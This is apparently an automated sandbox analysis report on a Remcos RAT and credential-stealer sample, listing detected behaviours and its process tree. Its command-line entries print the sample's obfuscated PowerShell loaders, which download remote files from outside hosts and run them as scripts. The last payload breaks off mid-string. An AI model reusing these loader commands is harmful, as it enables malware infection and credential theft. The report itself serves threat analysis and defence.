Malware Analysis Report

2024-12-07 22:15

Sample ID 240807-h4hgravapq
Target af3d6095ad1ce9cc31549c93bf7858e2989d725e2c7a34adb975b76c09bac8ba.zip
SHA256 08ddc21fdf4ccd1ae678df5479c23128c933bb11393ca4660e1f6e213b246c64
Tags
defense_evasion discovery execution remcos remotehost collection credential_access rat spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

08ddc21fdf4ccd1ae678df5479c23128c933bb11393ca4660e1f6e213b246c64

Threat Level: Known bad

The file af3d6095ad1ce9cc31549c93bf7858e2989d725e2c7a34adb975b76c09bac8ba.zip was found to be: Known bad.

Malicious Activity Summary

defense_evasion discovery execution remcos remotehost collection credential_access rat spyware stealer

Remcos

NirSoft WebBrowserPassView

Detected Nirsoft tools

Credentials from Password Stores: Credentials from Web Browsers

NirSoft MailPassView

Evasion via Device Credential Deployment

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Reads user/profile data of web browsers

Checks computer location settings

Accesses Microsoft Outlook accounts

Suspicious use of SetThreadContext

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Suspicious use of AdjustPrivilegeToken

Modifies Internet Explorer settings

Modifies registry class

Suspicious behavior: MapViewOfSection

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: GetForegroundWindowSpam

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-07 07:17

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-07 07:17

Reported

2024-08-07 07:17

Platform

win7-20240704-en

Max time kernel

18s

Max time network

16s

Command Line

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\af3d6095ad1ce9cc31549c93bf7858e2989d725e2c7a34adb975b76c09bac8ba.hta"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Evasion via Device Credential Deployment

defense_evasion execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WScript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2392 wrote to memory of 2280 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2392 wrote to memory of 2280 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2392 wrote to memory of 2280 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2392 wrote to memory of 2280 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2888 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2280 wrote to memory of 2888 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2280 wrote to memory of 2888 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2280 wrote to memory of 2888 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2888 wrote to memory of 2760 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2888 wrote to memory of 2760 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2888 wrote to memory of 2760 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2888 wrote to memory of 2760 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2760 wrote to memory of 2872 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2760 wrote to memory of 2872 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2760 wrote to memory of 2872 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2760 wrote to memory of 2872 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2888 wrote to memory of 2676 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WScript.exe
PID 2888 wrote to memory of 2676 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WScript.exe
PID 2888 wrote to memory of 2676 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WScript.exe
PID 2888 wrote to memory of 2676 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WScript.exe
PID 2676 wrote to memory of 3064 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2676 wrote to memory of 3064 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2676 wrote to memory of 3064 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2676 wrote to memory of 3064 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3064 wrote to memory of 1800 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3064 wrote to memory of 1800 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3064 wrote to memory of 1800 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3064 wrote to memory of 1800 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\af3d6095ad1ce9cc31549c93bf7858e2989d725e2c7a34adb975b76c09bac8ba.hta"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" "/c poWERshelL.exe -Ex BypasS -noP -W 1 -c DeVIcecreDENTIAldePlOYmeNt ; iEx($(IEx('[SYsteM.TExT.eNcodiNg]'+[chaR]0x3A+[ChAr]0X3A+'UtF8.GeTstRinG([sYStEM.convERt]'+[CHaR]0x3A+[cHAr]0x3a+'froMBASe64sTRIng('+[chAr]34+'JDAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYkVSZEVGaW5JdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0cVZsSmJiLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCUVRyUCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeXYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuQ1JscyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaURCcnMpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIk9yaiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVzcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB6YlhvVEFTVEFLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDA6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTczLjE5Mi4xMzUvODgva2lkc3Jvc2VmYWNpbmdpbWFnZXN0cmlja2luZy5nSUYiLCIkZW52OkFQUERBVEFca2lkc3Jvc2VmYWNpbmdpbWFnZXN0cmlja2luLnZCUyIsMCwwKTtTVEFydC1zTGVlUCgzKTtTVGFydCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVudjpBUFBEQVRBXGtpZHNyb3NlZmFjaW5naW1hZ2VzdHJpY2tpbi52QlMi'+[chAR]34+'))')))"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

poWERshelL.exe -Ex BypasS -noP -W 1 -c DeVIcecreDENTIAldePlOYmeNt ; iEx($(IEx('[SYsteM.TExT.eNcodiNg]'+[chaR]0x3A+[ChAr]0X3A+'UtF8.GeTstRinG([sYStEM.convERt]'+[CHaR]0x3A+[cHAr]0x3a+'froMBASe64sTRIng('+[chAr]34+'JDAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYkVSZEVGaW5JdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0cVZsSmJiLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCUVRyUCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeXYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuQ1JscyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaURCcnMpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIk9yaiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVzcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB6YlhvVEFTVEFLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDA6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTczLjE5Mi4xMzUvODgva2lkc3Jvc2VmYWNpbmdpbWFnZXN0cmlja2luZy5nSUYiLCIkZW52OkFQUERBVEFca2lkc3Jvc2VmYWNpbmdpbWFnZXN0cmlja2luLnZCUyIsMCwwKTtTVEFydC1zTGVlUCgzKTtTVGFydCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVudjpBUFBEQVRBXGtpZHNyb3NlZmFjaW5naW1hZ2VzdHJpY2tpbi52QlMi'+[chAR]34+'))')))"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\e410m-ly.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8D24.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC8D23.tmp"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\kidsrosefacingimagestrickin.vBS"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J≩ ⫻ ㏤ ≪ ㏴Bs≩ ⫻ ㏤ ≪ ㏴Gk≩ ⫻ ㏤ ≪ ㏴bgBr≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴PQ≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴Cc≩ ⫻ ㏤ ≪ ㏴a≩ ⫻ ㏤ ≪ ㏴B0≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴c≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴6≩ ⫻ ㏤ ≪ ㏴C8≩ ⫻ ㏤ ≪ ㏴LwBz≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴cgB2≩ ⫻ ㏤ ≪ ㏴Gk≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴Bv≩ ⫻ ㏤ ≪ ㏴HI≩ ⫻ ㏤ ≪ ㏴dwBp≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴Bv≩ ⫻ ㏤ ≪ ㏴Hc≩ ⫻ ㏤ ≪ ㏴cw≩ ⫻ ㏤ ≪ ㏴u≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴Bu≩ ⫻ ㏤ ≪ ㏴HM≩ ⫻ ㏤ ≪ ㏴LgBj≩ ⫻ ㏤ ≪ ㏴G8≩ ⫻ ㏤ ≪ ㏴bQ≩ ⫻ ㏤ ≪ ㏴u≩ ⫻ ㏤ ≪ ㏴GI≩ ⫻ ㏤ ≪ ㏴cg≩ ⫻ ㏤ ≪ ㏴v≩ ⫻ ㏤ ≪ ㏴EY≩ ⫻ ㏤ ≪ ㏴aQBs≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴cw≩ ⫻ ㏤ ≪ ㏴v≩ ⫻ ㏤ ≪ ㏴HY≩ ⫻ ㏤ ≪ ㏴YgBz≩ ⫻ ㏤ ≪ ㏴C4≩ ⫻ ㏤ ≪ ㏴agBw≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴Zw≩ ⫻ ㏤ ≪ ㏴n≩ ⫻ ㏤ ≪ ㏴Ds≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴k≩ ⫻ ㏤ ≪ ㏴Hc≩ ⫻ ㏤ ≪ ㏴ZQBi≩ ⫻ ㏤ ≪ ㏴EM≩ ⫻ ㏤ ≪ ㏴b≩ ⫻ ㏤ ≪ ㏴Bp≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴bgB0≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴PQ≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴E4≩ ⫻ ㏤ ≪ ㏴ZQB3≩ ⫻ ㏤ ≪ ㏴C0≩ ⫻ ㏤ ≪ ㏴TwBi≩ ⫻ ㏤ ≪ ㏴Go≩ ⫻ ㏤ ≪ ㏴ZQBj≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴BT≩ ⫻ ㏤ ≪ ㏴Hk≩ ⫻ ㏤ ≪ ㏴cwB0≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴bQ≩ ⫻ ㏤ ≪ ㏴u≩ ⫻ ㏤ ≪ ㏴E4≩ ⫻ ㏤ ≪ ㏴ZQB0≩ ⫻ ㏤ ≪ ㏴C4≩ ⫻ ㏤ ≪ ㏴VwBl≩ ⫻ ㏤ ≪ ㏴GI≩ ⫻ ㏤ ≪ ㏴QwBs≩ ⫻ ㏤ ≪ ㏴Gk≩ ⫻ ㏤ ≪ ㏴ZQBu≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴Ow≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴cgB5≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴ew≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴CQ≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴Bv≩ ⫻ ㏤ ≪ ㏴Hc≩ ⫻ ㏤ ≪ ㏴bgBs≩ ⫻ ㏤ ≪ ㏴G8≩ ⫻ ㏤ ≪ ㏴YQBk≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴BE≩ ⫻ ㏤ ≪ ㏴GE≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴Bh≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴PQ≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴CQ≩ ⫻ ㏤ ≪ ㏴dwBl≩ ⫻ ㏤ ≪ ㏴GI≩ ⫻ ㏤ ≪ ㏴QwBs≩ ⫻ ㏤ ≪ ㏴Gk≩ ⫻ ㏤ ≪ ㏴ZQBu≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴LgBE≩ ⫻ ㏤ ≪ ㏴G8≩ ⫻ ㏤ ≪ ㏴dwBu≩ ⫻ ㏤ ≪ ㏴Gw≩ ⫻ ㏤ ≪ ㏴bwBh≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴R≩ ⫻ ㏤ ≪ ㏴Bh≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴YQ≩ ⫻ ㏤ ≪ ㏴o≩ ⫻ ㏤ ≪ ㏴CQ≩ ⫻ ㏤ ≪ ㏴b≩ ⫻ ㏤ ≪ ㏴Bp≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴aw≩ ⫻ ㏤ ≪ ㏴p≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴fQ≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴GM≩ ⫻ ㏤ ≪ ㏴YQB0≩ ⫻ ㏤ ≪ ㏴GM≩ ⫻ ㏤ ≪ ㏴a≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴Hs≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴BX≩ ⫻ ㏤ ≪ ㏴HI≩ ⫻ ㏤ ≪ ㏴aQB0≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴LQBI≩ ⫻ ㏤ ≪ ㏴G8≩ ⫻ ㏤ ≪ ㏴cwB0≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴JwBG≩ ⫻ ㏤ ≪ ㏴GE≩ ⫻ ㏤ ≪ ㏴aQBs≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴FQ≩ ⫻ ㏤ ≪ ㏴bw≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴bwB3≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴b≩ ⫻ ㏤ ≪ ㏴Bv≩ ⫻ ㏤ ≪ ㏴GE≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴YQB0≩ ⫻ ㏤ ≪ ㏴GE≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴Bm≩ ⫻ ㏤ ≪ ㏴HI≩ ⫻ ㏤ ≪ ㏴bwBt≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴J≩ ⫻ ㏤ ≪ ㏴Bs≩ ⫻ ㏤ ≪ ㏴Gk≩ ⫻ ㏤ ≪ ㏴bgBr≩ ⫻ ㏤ ≪ ㏴Cc≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴t≩ ⫻ ㏤ ≪ ㏴EY≩ ⫻ ㏤ ≪ ㏴bwBy≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴ZwBy≩ ⫻ ㏤ ≪ ㏴G8≩ ⫻ ㏤ ≪ ㏴dQBu≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴QwBv≩ ⫻ ㏤ ≪ ㏴Gw≩ ⫻ ㏤ ≪ ㏴bwBy≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴UgBl≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴Ow≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴e≩ ⫻ ㏤ ≪ ㏴Bp≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴B9≩ ⫻ ㏤ ≪ ㏴Ds≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴Bp≩ ⫻ ㏤ ≪ ㏴GY≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴o≩ ⫻ ㏤ ≪ ㏴CQ≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴Bv≩ ⫻ ㏤ ≪ ㏴Hc≩ ⫻ ㏤ ≪ ㏴bgBs≩ ⫻ ㏤ ≪ ㏴G8≩ ⫻ ㏤ ≪ ㏴YQBk≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴BE≩ ⫻ ㏤ ≪ ㏴GE≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴Bh≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴LQBu≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴k≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴dQBs≩ ⫻ ㏤ ≪ ㏴Gw≩ ⫻ ㏤ ≪ ㏴KQ≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴Hs≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴k≩ ⫻ ㏤ ≪ ㏴Gk≩ ⫻ ㏤ ≪ ㏴bQBh≩ ⫻ ㏤ ≪ ㏴Gc≩ ⫻ ㏤ ≪ ㏴ZQBU≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴e≩ ⫻ ㏤ ≪ ㏴B0≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴PQ≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴Fs≩ ⫻ ㏤ ≪ ㏴UwB5≩ ⫻ ㏤ ≪ ㏴HM≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴Bl≩ ⫻ ㏤ ≪ ㏴G0≩ ⫻ ㏤ ≪ ㏴LgBU≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴e≩ ⫻ ㏤ ≪ ㏴B0≩ ⫻ ㏤ ≪ ㏴C4≩ ⫻ ㏤ ≪ ㏴RQBu≩ ⫻ ㏤ ≪ ㏴GM≩ ⫻ ㏤ ≪ ㏴bwBk≩ ⫻ ㏤ ≪ ㏴Gk≩ ⫻ ㏤ ≪ ㏴bgBn≩ ⫻ ㏤ ≪ ㏴F0≩ ⫻ ㏤ ≪ ㏴Og≩ ⫻ ㏤ ≪ ㏴6≩ ⫻ ㏤ ≪ ㏴FU≩ ⫻ ㏤ ≪ ㏴V≩ ⫻ ㏤ ≪ ㏴BG≩ ⫻ ㏤ ≪ ㏴Dg≩ ⫻ ㏤ ≪ ㏴LgBH≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴BT≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴cgBp≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴Zw≩ ⫻ ㏤ ≪ ㏴o≩ ⫻ ㏤ ≪ ㏴CQ≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴Bv≩ ⫻ ㏤ ≪ ㏴Hc≩ ⫻ ㏤ ≪ ㏴bgBs≩ ⫻ ㏤ ≪ ㏴G8≩ ⫻ ㏤ ≪ ㏴YQBk≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴BE≩ ⫻ ㏤ ≪ ㏴GE≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴Bh≩ ⫻ ㏤ ≪ ㏴Ck≩ 